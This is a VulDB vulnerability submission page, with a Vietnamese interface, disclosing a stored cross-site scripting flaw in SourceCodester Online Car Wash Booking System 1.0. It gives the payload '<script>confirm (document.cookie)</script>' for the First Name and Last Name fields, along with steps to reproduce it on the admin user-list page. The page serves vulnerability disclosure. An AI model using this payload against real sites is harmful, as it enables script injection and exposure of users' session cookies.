Gửi #344504: SourceCodester Online Car Wash Booking System 1.0 Cross Site Scriptingthông tin

tiêu đềSourceCodester Online Car Wash Booking System 1.0 Cross Site Scripting
Mô tả# Exploit Title: Online Car Wash Booking System - Stored XSS # Exploit Author: darkrai069 # Vendor Name: oretnom23 # Vendor Homepage: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html # Software Link: https://www.sourcecodester.com/php/15274/online-car-wash-booking-system-phpoop-free-source-code.html # Version: v1.0 # Tested on: Windows 10, Apache ` Description:- A Stored Cross-Site Scripting (XSS) vulnerability in Online Car Wash Booking System allows to inject Arbitrary JavaScript in Edit in "First Name" and "Last Name". ` Payload used:- <script>confirm (document.cookie)</script> ` Parameter":- First Name: <script>confirm (document.cookie)</script> Last Name: <script>confirm (document.cookie)</script> ` Steps to reproduce:- 1. Login into your admin account 2. Now go to http://localhost:8080/ocwbs/admin/?page=user/list and add an new user 3. In that "First Name" and " Last Name " parameter put the payload. <script>confirm (document.cookie)</script> 4. As you can see our payload has been executed.
Người dùng
 Anonymous User
Đệ trình25/05/2024 15:19 (cách đây 2 những năm)
Kiểm duyệt25/05/2024 20:27 (5 hours later)
Trạng tháiđược chấp nhận
Mục VulDB266303 [oretnom23 Online Car Wash Booking System 1.0 /admin/?page=user/list First Name/Last Name Tập lệnh chéo trang]
điểm17

Want to stay up to date on a daily basis?

Enable the mail alert feature now!